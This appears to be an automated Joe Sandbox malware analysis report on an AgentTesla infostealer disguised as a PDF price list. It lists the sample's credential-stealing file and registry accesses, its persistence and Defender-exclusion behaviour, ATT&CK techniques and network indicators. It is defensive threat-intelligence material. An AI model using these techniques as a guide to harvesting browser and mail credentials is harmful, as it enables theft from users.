                    Source: Yara matchFile source: Process Memory Space: 26.09 01.10.2024Fiyat Listesi.pdf.exe PID: 7620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7216, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1894805275.0000000003171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4141088444.0000000002F2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 26.09 01.10.2024Fiyat Listesi.pdf.exe PID: 7620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 26.09 01.10.2024Fiyat Listesi.pdf.exe PID: 7788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7216, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 3260, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 26.09 01.10.2024Fiyat Listesi.pdf.exe PID: 7620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7216, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Registry Run Keys / Startup Folder                    		12
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		31
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		3
                    Obfuscated Files or Information                    		Security Account Manager211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS2
                    Process Discovery                    		Distributed Component Object Model31
                    Input Capture                    		11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Hidden Files and Directories                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519324 Sample: 26.09 01.10.2024Fiyat Liste... Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 41 mail.musabody.com 2->41 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 13 other signatures 2->59 8 26.09 01.10.2024Fiyat Listesi.pdf.exe 4 2->8         started        12 ctsdvwT.exe 3 2->12         started        14 ctsdvwT.exe 2 2->14         started        signatures3 process4 file5 37 26.09 01.10.2024Fi...Listesi.pdf.exe.log, ASCII 8->37 dropped 61 Adds a directory exclusion to Windows Defender 8->61 16 26.09 01.10.2024Fiyat Listesi.pdf.exe 1 5 8->16         started        21 powershell.exe 23 8->21         started        63 Multi AV Scanner detection for dropped file 12->63 65 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->65 67 Machine Learning detection for dropped file 12->67 23 ctsdvwT.exe 2 12->23         started        25 ctsdvwT.exe 12->25         started        27 ctsdvwT.exe 12->27         started        29 ctsdvwT.exe 14->29         started        signatures6 process7 dnsIp8 39 mail.musabody.com 108.167.140.123, 587, 63219, 63220 UNIFIEDLAYER-AS-1US United States 16->39 33 C:\Users\user\AppData\Roaming\...\ctsdvwT.exe, PE32 16->33 dropped 35 C:\Users\user\...\ctsdvwT.exe:Zone.Identifier, ASCII 16->35 dropped 43 Tries to steal Mail credentials (via file / registry access) 16->43 45 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->45 47 Installs a global keyboard hook 16->47 49 Loading BitLocker PowerShell Module 21->49 31 conhost.exe 21->31         started        51 Tries to harvest and steal browser information (history, passwords, etc) 29->51 file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    26.09 01.10.2024Fiyat Listesi.pdf.exe29%ReversingLabsByteCode-MSIL.Trojan.Generic
                    26.09 01.10.2024Fiyat Listesi.pdf.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe29%ReversingLabsByteCode-MSIL.Trojan.Generic

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.fontbureau.com0%URL Reputationsafe
                    http://www.fontbureau.com/designersG0%URL Reputationsafe
                    http://www.fontbureau.com/designers/?0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://www.fontbureau.com/designers?0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.com/designers0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.fontbureau.com/designers80%URL Reputationsafe
                    http://www.fonts.com0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
                    http://mail.musabody.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.musabody.com
                    		108.167.140.123
                    		truetrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.026.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.com26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersG26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers/?26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.founder.com.cn/cn/bThe26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://account.dyn.com/26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.tiro.com26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.goodfont.co.kr26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.carterandcone.coml26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.sajatypeworks.com26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.typography.netD26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers/cabarga.htmlN26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.founder.com.cn/cn/cThe26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.galapagosdesign.com/staff/dennis.htm26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.founder.com.cn/cn26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers/frere-user.html26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.galapagosdesign.com/DPlease26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers826.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fonts.com26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.sandoll.co.kr26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.urwpp.deDPlease26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.zhongyicts.com.cn26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1705109897.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1830841149.0000000003167000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1913937997.0000000002D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.sakkal.com26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1708246327.0000000007522000.00000004.00000800.00020000.00000000.sdmp, 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000000.00000002.1707971157.0000000005D80000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://mail.musabody.com26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002A09000.00000004.00000800.00020000.00000000.sdmp, 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002A15000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      108.167.140.123
                      		mail.musabody.comUnited States
                      		46606UNIFIEDLAYER-AS-1UStrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1519324
                      Start date and time:2024-09-26 11:22:08 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 21s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:15
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:26.09 01.10.2024Fiyat Listesi.pdf.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@16/9@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 206
                      • Number of non-executed functions: 4
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • VT rate limit hit for: 26.09 01.10.2024Fiyat Listesi.pdf.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      05:22:59API Interceptor8686237x Sleep call for process: 26.09 01.10.2024Fiyat Listesi.pdf.exe modified
                      05:23:01API Interceptor9x Sleep call for process: powershell.exe modified
                      05:23:12API Interceptor7333622x Sleep call for process: ctsdvwT.exe modified
                      10:23:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                      10:23:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      108.167.140.123Eschemyquote24573j33.exeGet hashmaliciousAgentTeslaBrowse
                        PO-2024)bekotas.pdf.exeGet hashmaliciousAgentTeslaBrowse
                          Price 10243975 Bekotas A.S scan.pdf.exeGet hashmaliciousAgentTeslaBrowse
                            DUYAR MOTOR POMPA 2024 F#U0130YAT L#U0130STES#U0130 KATALOG.exeGet hashmaliciousAgentTeslaBrowse
                              rRFQ_251477800TM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  rPO50018137-14_pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                    62402781, Fiyat Teklif Talebi.pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                      2024-19-2118fernas.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        DHL Shipping DocumentTracking No Confirmation.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          mail.musabody.comEschemyquote24573j33.exeGet hashmaliciousAgentTeslaBrowse
                                          • 108.167.140.123
                                          PO-2024)bekotas.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 108.167.140.123
                                          Price 10243975 Bekotas A.S scan.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 108.167.140.123
                                          DUYAR MOTOR POMPA 2024 F#U0130YAT L#U0130STES#U0130 KATALOG.exeGet hashmaliciousAgentTeslaBrowse
                                          • 108.167.140.123
                                          rRFQ_251477800TM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 108.167.140.123
                                          Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 108.167.140.123
                                          rPO50018137-14_pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                          • 108.167.140.123
                                          62402781, Fiyat Teklif Talebi.pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                          • 108.167.140.123
                                          2024-19-2118fernas.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 108.167.140.123
                                          DHL Shipping DocumentTracking No Confirmation.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 108.167.140.123

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          UNIFIEDLAYER-AS-1UShttps://iskiosvillas.gr/booking/AAMAyYwBGAAAAAAB2B1ZmTNuNBwBbZXOiMVmgTZdxswVIV.htmlGet hashmaliciousUnknownBrowse
                                          • 192.185.78.86
                                          HPDeskJet_043_SCAN.pdfGet hashmaliciousPhisherBrowse
                                          • 108.179.194.88
                                          Eschemyquote24573j33.exeGet hashmaliciousAgentTeslaBrowse
                                          • 108.167.140.123
                                          shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                          • 162.214.80.31
                                          autorization Letter.exeGet hashmaliciousAgentTeslaBrowse
                                          • 192.185.129.60
                                          http://www.richfieldkennel.com/SharePointProposalFile/Get hashmaliciousHTMLPhisherBrowse
                                          • 192.185.102.120
                                          https://putefix.dogfriendlytahoe.com/Get hashmaliciousUnknownBrowse
                                          • 192.185.24.110
                                          https://albertanewsprint.dogfriendlytahoe.com/Get hashmaliciousUnknownBrowse
                                          • 192.185.24.110
                                          INDIA - VSL PARTICULARS.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 50.87.144.157
                                          https://dwr.yoh.mybluehost.me/wp-content/plugins/A/sdh/TU17HLK/Get hashmaliciousUnknownBrowse
                                          • 50.6.153.157

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\26.09 01.10.2024Fiyat Listesi.pdf.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:true
                                          Reputation:high, very likely benign file
